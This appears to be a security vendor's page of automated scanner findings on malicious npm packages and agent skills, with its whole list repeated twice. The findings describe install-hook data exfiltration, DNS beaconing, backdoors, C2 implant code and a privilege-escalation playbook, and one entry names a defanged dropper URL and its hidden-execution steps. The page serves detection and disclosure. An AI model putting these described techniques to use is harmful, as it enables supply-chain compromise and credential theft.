Secure your dependencies. Ship with confidence.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

This code is intentionally malicious and captures sensitive information. It sends this data to external URLs, indicating a supply chain attack. The message printed to the console suggests that this is intentional. The code poses a significant security risk and should not be used.

Live on npm for 4 minutes before removal. Socket users were protected even while the package was live.

The code is highly suspicious due to its collection and exfiltration of sensitive information (system paths, user info, and package metadata) to external URLs. The use of hardcoded URLs, especially to non-reputable domains, and the infinite loop for data exfiltration suggest potential malicious intent.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

The code provided exhibits significant obfuscation and suspicious patterns, such as the use of eval and complex string manipulations, which are typical indicators of potentially malicious behavior. Without further deobfuscation, it is not possible to definitively determine the intent, but it is highly concerning and warrants caution.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

This code performs covert data-leakage/beaconing: it collects local environment identifiers, constructs a DNS name embedding them, resolves that name against a hardcoded external domain, and then exits. The obfuscation and evasive module loading strongly indicate intent to hide behavior. Treat this module as malicious/untrusted until maintainers provide a convincing, documented justification for this exact behavior. Immediate recommended actions: do not install/run the package, investigate any systems where it executed, and block DNS queries to the specified domain(s).

This package will execute index.js automatically during installation. That gives the package the ability to perform potentially harmful or unwanted actions (data exfiltration, telemetry, modifying the filesystem, running arbitrary commands). You must inspect the contents of index.js before installing or avoid installing packages that run arbitrary scripts during install.

This source file implements a network pivot/listener component of the Sliver implant framework, enabling encrypted peer-to-peer pivoting and forwarding of protobuf-based C2 envelopes. Behavior is consistent with a remote control implant component and therefore presents high security risk in most benign deployment contexts (it is explicitly an implant/C2 artifact). The code itself does not show obfuscation or obvious credential harvesting beyond normal C2 functionality, but it forwards potentially arbitrary data upstream and downstream which can be used for command-and-control and data exfiltration. Use of this code in a project should be considered malicious unless the package is intentionally used in an offensive security context with appropriate authorization.

[Skill Scanner] Instruction to copy/paste content into terminal detected All findings: [CRITICAL] command_injection: Instruction to copy/paste content into terminal detected (CI012) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: PowerShell execution detected (CI005) [AITech 9.1.4] This skill is an explicit offensive-operations playbook for Windows privilege escalation. The capabilities and commands accurately implement the stated purpose (privilege escalation), but they are high-risk and directly enable credential theft, remote command execution, and system compromise. While legitimate for authorized pentesting, the content is dangerous if used maliciously and encourages evasion techniques. Treat as malicious/offensive guidance in untrusted contexts and restrict distribution and execution to authorized security engagements. LLM verification: This skill is offensive by design: it provides explicit, actionable steps and commands to perform Windows privilege escalation (credential dumping, service hijacking, reverse shells, etc.). The capabilities match the stated purpose, so it is internally consistent, but the content is high-risk and easily abused. For supply-chain assessment: the document itself is not obfuscated and does not contain embedded malware binaries, but it prescribes using powerful dual-use tools and network exfiltration

This module contains explicit remote code execution behavior: it runs shell commands received over a datachannel and returns their output. It also exposes session/signature tokens in the signaling connect URL and streams local webcam data. These behaviors together constitute a remote backdoor and serious privacy/security risk. Unless this is intended and protected by out-of-band authorization, the code should be considered malicious/backdoor-capable and not safe to include unreviewed in production.

The file constructs an obfuscated PowerShell command by joining split string fragments, then calls subprocess.run(shell=True) to execute it. The command uses Invoke-WebRequest to fetch 'http://stellar-conquest[.]fr/launcher[.]bat' over HTTP to %TEMP%\launcher.bat, and then Start-Process with -ExecutionPolicy Bypass and -WindowStyle Hidden to run that batch file. The combination of string fragmentation (evasion), insecure transport, policy bypass, hidden window execution, and lack of any integrity or authenticity verification makes this a high-risk remote-code-execution dropper.

The code actively embeds user-provided content and executes inline scripts while dynamically loading external scripts. This pattern poses a significant security risk if m.content can be influenced by untrusted sources. Although the component tracks previously seen scripts to avoid re-execution, the lack of sanitization and CSP hardening makes it susceptible to XSS and remote code execution. In a supply chain context, this is unacceptable unless inputs are strictly trusted and isolation is guaranteed. Recommend removing inline script execution, avoiding dangerous innerHTML, implementing strict content sanitization, and applying a strict Content-Security-Policy plus sandboxed execution if script execution is required.

This function is a high-risk primitive: it performs filesystem access and arbitrary SQL execution based entirely on untrusted input. While not obviously malicious (no obfuscated payloads, no hardcoded secrets, no network exfiltration code), its design enables data exfiltration and destructive operations when reachable by untrusted callers (for example, if registered as a LangChain Tool exposed to model prompts). Mitigations: restrict tool exposure to trusted callers, implement allowlists for allowed database file paths, validate or parameterize queries (or only allow predefined named queries), remove or sanitize error messages, use context managers to ensure connection closure, and disable unsafe SQLite features (LOAD_EXTENSION). Do not register this tool with agents that can be driven by untrusted input without applying strict controls.

The code fragment exhibits high-risk patterns: a broad AMT tooling surface combined with a WebSocket relay proxy that can forward to arbitrary destinations, plus a large opaque payload and insecure TLS handling. This strongly indicates potential malicious activity or backdoor-like capabilities if deployed as part of a library. Recommend treating as suspicious, performing thorough audit, removing the TLS verification bypass, constraining allowed destinations, enforcing authentication, and isolating any embedded payload with a verifiable origin. In a supply-chain context, this warrants at least a medium-high security risk assessment and caution in adoption.

Most of the code is legitimate SDK and protocol handling used by AWS and Google client libraries. However, the presence of a function (named updatePackage in module 40766) that downloads an npm tarball, injects local code (process.argv[1]) into the package, repacks it, and runs npm publish is a clear supply-chain risk and strongly suspicious. That function provides a mechanism to inject and publish arbitrary code into existing packages and should be considered malicious or at least severely dangerous in the context of a trusted dependency. Apart from that function, the other modules perform expected SDK operations (credential providers, request signing, proto loading). Recommend immediately auditing who authored/added the updatePackage code, removing or isolating it, and scanning package history for commits introducing such behavior. If you consume this bundle, avoid executing the updatePackage workflow and do not run npm publish flows originating from this code. Rotate any potentially exposed credentials and audit your registry activity.

Live on npm for 3 hours and 56 minutes before removal. Socket users were protected even while the package was live.

The script sends potentially sensitive information about the system to an external server, which poses a significant security risk and is indicative of malicious behavior.

Live on npm for 11 days, 18 hours and 11 minutes before removal. Socket users were protected even while the package was live.

This module is highly obfuscated and uses eval on a large embedded encoded payload to reconstruct runtime identifiers and behavior. It sets up MQTT subscriptions and publishes, builds and calls remote URLs (likely HTTP requests), parses untrusted JSON from MQTT messages, and executes handlers that can cause further network requests. While I see no explicit filesystem destruction, shell spawning, or direct credential harvesting in the visible code, the use of eval and heavy obfuscation is a strong supply-chain risk: it conceals intent and may execute arbitrary behavior delivered in the encoded blob or via remote commands. I recommend treating this package as suspicious: do not run it in production until fully deobfuscated and audited. If present in a dependency tree, remove or isolate and perform a full dynamic analysis in a safe environment.

This script performs bulk, unconditional deletion of many Ansible collection directories under the specified ANSIBLE_COLLECTIONS_PATH. It does not read external input (other than the hardcoded path variable) and does not perform network activity, but it is destructive and can effectively sabotage environments that rely on those collections. Use is dangerous — do not run unless you intentionally want to remove those exact directories and have backups. Recommend blocking or requiring manual review and safe-guards (confirmation, dry-run, path validation) before execution.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The skill's declared purpose (browser automation, scraping, form filling, screenshots, and optional cloud-hosted sessions) is coherent with most capabilities. However, some capabilities (exporting/syncing cookies and Chrome profiles to cloud, `--browser real` accessing local profiles, and persistent execution of arbitrary Python) are high-privilege and can expose credentials/session tokens. The documentation partially mitigates this by recommending domain-restricted sync and explicit prompts, but it omits exact network endpoints and whether API keys/data are proxied. Because of those high-impact data flows (cookies/ profiles -> cloud) and the potential for arbitrary code execution in the Python session, the package should be treated with caution: review the implementation to confirm where network requests go and that syncing requires explicit user consent and fine-grained controls. There is no clear sign of intentional malware in the provided text, but the feature set enables credential-exfiltration if mis-implemented or abused. LLM verification: The document describes a powerful browser automation CLI with legitimate uses but with multiple high-impact data-exposure capabilities: access to real browser profiles, cookie export/import, arbitrary JS evaluation, persistent Python execution, and remote cloud execution. The README shows no direct indicators of malware, hard-coded backdoors, or obfuscation in behavior, but the described features create significant opportunities for credential theft or data exfiltration if misused, implemented i

The SweetAlert2 library code is mostly benign and serves as a UI modal dialog tool. However, it contains a suspicious and potentially malicious snippet that targets Russian users on certain domains to play an unsolicited audio prank, disabling pointer events and potentially disrupting user interaction. This behavior is unexpected and should be considered a moderate security risk and potential malware. The rest of the code shows no signs of malicious intent. The provided reports were invalid and unhelpful. Users should be cautious about this version of the library due to the embedded prank behavior.

The script gathers data about the user's system, including package name, current working directory, username, hostname, and IP address. This data is then encoded and sent as DNS queries to a remote server.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

This package runs arbitrary local code during installation (node index.js). That behavior is inherently risky: index.js could perform telemetry, exfiltrate secrets, install backdoors, modify the repository, or spawn remote shells. Before installing, inspect the contents of index.js and any files it loads; prefer installing only from trusted packages or run installation in an isolated environment. The declared dependencies (axios, node-fetch, ws) increase the potential for network-based malicious behavior but are not themselves flagged as non-registry sources.

Live on npm for 14 hours and 48 minutes before removal. Socket users were protected even while the package was live.

The code exhibits clear malicious-and-suspicious behavior: credential harvesting, insecure cryptography, exfiltration of local assets, and automated interaction with protected endpoints on an attacker-controlled domain. In a supply-chain context, inclusion of this module would create severe security risks, including unauthorized data access and data leakage. This code should be treated as dangerous, blocked, and subjected to thorough review and remediation (remove hardcoded secrets, implement secure cryptography with randomized IVs, strengthen error handling, and prevent exfiltration of local files).

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

The code is highly suspicious and potentially malicious. It fetches and executes remote HTML content from a suspicious domain without sanitization, exposing users to XSS and malware injection risks. This behavior is indicative of a supply chain security incident and should be treated as high risk. The component should be removed or thoroughly audited before use.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

This code is intentionally malicious and captures sensitive information. It sends this data to external URLs, indicating a supply chain attack. The message printed to the console suggests that this is intentional. The code poses a significant security risk and should not be used.

Live on npm for 4 minutes before removal. Socket users were protected even while the package was live.

The code is highly suspicious due to its collection and exfiltration of sensitive information (system paths, user info, and package metadata) to external URLs. The use of hardcoded URLs, especially to non-reputable domains, and the infinite loop for data exfiltration suggest potential malicious intent.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

The code provided exhibits significant obfuscation and suspicious patterns, such as the use of eval and complex string manipulations, which are typical indicators of potentially malicious behavior. Without further deobfuscation, it is not possible to definitively determine the intent, but it is highly concerning and warrants caution.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

This code performs covert data-leakage/beaconing: it collects local environment identifiers, constructs a DNS name embedding them, resolves that name against a hardcoded external domain, and then exits. The obfuscation and evasive module loading strongly indicate intent to hide behavior. Treat this module as malicious/untrusted until maintainers provide a convincing, documented justification for this exact behavior. Immediate recommended actions: do not install/run the package, investigate any systems where it executed, and block DNS queries to the specified domain(s).

This package will execute index.js automatically during installation. That gives the package the ability to perform potentially harmful or unwanted actions (data exfiltration, telemetry, modifying the filesystem, running arbitrary commands). You must inspect the contents of index.js before installing or avoid installing packages that run arbitrary scripts during install.

This source file implements a network pivot/listener component of the Sliver implant framework, enabling encrypted peer-to-peer pivoting and forwarding of protobuf-based C2 envelopes. Behavior is consistent with a remote control implant component and therefore presents high security risk in most benign deployment contexts (it is explicitly an implant/C2 artifact). The code itself does not show obfuscation or obvious credential harvesting beyond normal C2 functionality, but it forwards potentially arbitrary data upstream and downstream which can be used for command-and-control and data exfiltration. Use of this code in a project should be considered malicious unless the package is intentionally used in an offensive security context with appropriate authorization.

[Skill Scanner] Instruction to copy/paste content into terminal detected All findings: [CRITICAL] command_injection: Instruction to copy/paste content into terminal detected (CI012) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: PowerShell execution detected (CI005) [AITech 9.1.4] This skill is an explicit offensive-operations playbook for Windows privilege escalation. The capabilities and commands accurately implement the stated purpose (privilege escalation), but they are high-risk and directly enable credential theft, remote command execution, and system compromise. While legitimate for authorized pentesting, the content is dangerous if used maliciously and encourages evasion techniques. Treat as malicious/offensive guidance in untrusted contexts and restrict distribution and execution to authorized security engagements. LLM verification: This skill is offensive by design: it provides explicit, actionable steps and commands to perform Windows privilege escalation (credential dumping, service hijacking, reverse shells, etc.). The capabilities match the stated purpose, so it is internally consistent, but the content is high-risk and easily abused. For supply-chain assessment: the document itself is not obfuscated and does not contain embedded malware binaries, but it prescribes using powerful dual-use tools and network exfiltration

This module contains explicit remote code execution behavior: it runs shell commands received over a datachannel and returns their output. It also exposes session/signature tokens in the signaling connect URL and streams local webcam data. These behaviors together constitute a remote backdoor and serious privacy/security risk. Unless this is intended and protected by out-of-band authorization, the code should be considered malicious/backdoor-capable and not safe to include unreviewed in production.

The file constructs an obfuscated PowerShell command by joining split string fragments, then calls subprocess.run(shell=True) to execute it. The command uses Invoke-WebRequest to fetch 'http://stellar-conquest[.]fr/launcher[.]bat' over HTTP to %TEMP%\launcher.bat, and then Start-Process with -ExecutionPolicy Bypass and -WindowStyle Hidden to run that batch file. The combination of string fragmentation (evasion), insecure transport, policy bypass, hidden window execution, and lack of any integrity or authenticity verification makes this a high-risk remote-code-execution dropper.

The code actively embeds user-provided content and executes inline scripts while dynamically loading external scripts. This pattern poses a significant security risk if m.content can be influenced by untrusted sources. Although the component tracks previously seen scripts to avoid re-execution, the lack of sanitization and CSP hardening makes it susceptible to XSS and remote code execution. In a supply chain context, this is unacceptable unless inputs are strictly trusted and isolation is guaranteed. Recommend removing inline script execution, avoiding dangerous innerHTML, implementing strict content sanitization, and applying a strict Content-Security-Policy plus sandboxed execution if script execution is required.

This function is a high-risk primitive: it performs filesystem access and arbitrary SQL execution based entirely on untrusted input. While not obviously malicious (no obfuscated payloads, no hardcoded secrets, no network exfiltration code), its design enables data exfiltration and destructive operations when reachable by untrusted callers (for example, if registered as a LangChain Tool exposed to model prompts). Mitigations: restrict tool exposure to trusted callers, implement allowlists for allowed database file paths, validate or parameterize queries (or only allow predefined named queries), remove or sanitize error messages, use context managers to ensure connection closure, and disable unsafe SQLite features (LOAD_EXTENSION). Do not register this tool with agents that can be driven by untrusted input without applying strict controls.

The code fragment exhibits high-risk patterns: a broad AMT tooling surface combined with a WebSocket relay proxy that can forward to arbitrary destinations, plus a large opaque payload and insecure TLS handling. This strongly indicates potential malicious activity or backdoor-like capabilities if deployed as part of a library. Recommend treating as suspicious, performing thorough audit, removing the TLS verification bypass, constraining allowed destinations, enforcing authentication, and isolating any embedded payload with a verifiable origin. In a supply-chain context, this warrants at least a medium-high security risk assessment and caution in adoption.

Most of the code is legitimate SDK and protocol handling used by AWS and Google client libraries. However, the presence of a function (named updatePackage in module 40766) that downloads an npm tarball, injects local code (process.argv[1]) into the package, repacks it, and runs npm publish is a clear supply-chain risk and strongly suspicious. That function provides a mechanism to inject and publish arbitrary code into existing packages and should be considered malicious or at least severely dangerous in the context of a trusted dependency. Apart from that function, the other modules perform expected SDK operations (credential providers, request signing, proto loading). Recommend immediately auditing who authored/added the updatePackage code, removing or isolating it, and scanning package history for commits introducing such behavior. If you consume this bundle, avoid executing the updatePackage workflow and do not run npm publish flows originating from this code. Rotate any potentially exposed credentials and audit your registry activity.

Live on npm for 3 hours and 56 minutes before removal. Socket users were protected even while the package was live.

The script sends potentially sensitive information about the system to an external server, which poses a significant security risk and is indicative of malicious behavior.

Live on npm for 11 days, 18 hours and 11 minutes before removal. Socket users were protected even while the package was live.

This module is highly obfuscated and uses eval on a large embedded encoded payload to reconstruct runtime identifiers and behavior. It sets up MQTT subscriptions and publishes, builds and calls remote URLs (likely HTTP requests), parses untrusted JSON from MQTT messages, and executes handlers that can cause further network requests. While I see no explicit filesystem destruction, shell spawning, or direct credential harvesting in the visible code, the use of eval and heavy obfuscation is a strong supply-chain risk: it conceals intent and may execute arbitrary behavior delivered in the encoded blob or via remote commands. I recommend treating this package as suspicious: do not run it in production until fully deobfuscated and audited. If present in a dependency tree, remove or isolate and perform a full dynamic analysis in a safe environment.

This script performs bulk, unconditional deletion of many Ansible collection directories under the specified ANSIBLE_COLLECTIONS_PATH. It does not read external input (other than the hardcoded path variable) and does not perform network activity, but it is destructive and can effectively sabotage environments that rely on those collections. Use is dangerous — do not run unless you intentionally want to remove those exact directories and have backups. Recommend blocking or requiring manual review and safe-guards (confirmation, dry-run, path validation) before execution.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The skill's declared purpose (browser automation, scraping, form filling, screenshots, and optional cloud-hosted sessions) is coherent with most capabilities. However, some capabilities (exporting/syncing cookies and Chrome profiles to cloud, `--browser real` accessing local profiles, and persistent execution of arbitrary Python) are high-privilege and can expose credentials/session tokens. The documentation partially mitigates this by recommending domain-restricted sync and explicit prompts, but it omits exact network endpoints and whether API keys/data are proxied. Because of those high-impact data flows (cookies/ profiles -> cloud) and the potential for arbitrary code execution in the Python session, the package should be treated with caution: review the implementation to confirm where network requests go and that syncing requires explicit user consent and fine-grained controls. There is no clear sign of intentional malware in the provided text, but the feature set enables credential-exfiltration if mis-implemented or abused. LLM verification: The document describes a powerful browser automation CLI with legitimate uses but with multiple high-impact data-exposure capabilities: access to real browser profiles, cookie export/import, arbitrary JS evaluation, persistent Python execution, and remote cloud execution. The README shows no direct indicators of malware, hard-coded backdoors, or obfuscation in behavior, but the described features create significant opportunities for credential theft or data exfiltration if misused, implemented i

The SweetAlert2 library code is mostly benign and serves as a UI modal dialog tool. However, it contains a suspicious and potentially malicious snippet that targets Russian users on certain domains to play an unsolicited audio prank, disabling pointer events and potentially disrupting user interaction. This behavior is unexpected and should be considered a moderate security risk and potential malware. The rest of the code shows no signs of malicious intent. The provided reports were invalid and unhelpful. Users should be cautious about this version of the library due to the embedded prank behavior.

The script gathers data about the user's system, including package name, current working directory, username, hostname, and IP address. This data is then encoded and sent as DNS queries to a remote server.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

This package runs arbitrary local code during installation (node index.js). That behavior is inherently risky: index.js could perform telemetry, exfiltrate secrets, install backdoors, modify the repository, or spawn remote shells. Before installing, inspect the contents of index.js and any files it loads; prefer installing only from trusted packages or run installation in an isolated environment. The declared dependencies (axios, node-fetch, ws) increase the potential for network-based malicious behavior but are not themselves flagged as non-registry sources.

Live on npm for 14 hours and 48 minutes before removal. Socket users were protected even while the package was live.

The code exhibits clear malicious-and-suspicious behavior: credential harvesting, insecure cryptography, exfiltration of local assets, and automated interaction with protected endpoints on an attacker-controlled domain. In a supply-chain context, inclusion of this module would create severe security risks, including unauthorized data access and data leakage. This code should be treated as dangerous, blocked, and subjected to thorough review and remediation (remove hardcoded secrets, implement secure cryptography with randomized IVs, strengthen error handling, and prevent exfiltration of local files).

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

The code is highly suspicious and potentially malicious. It fetches and executes remote HTML content from a suspicious domain without sanitization, exposing users to XSS and malware injection risks. This behavior is indicative of a supply chain security incident and should be treated as high risk. The component should be removed or thoroughly audited before use.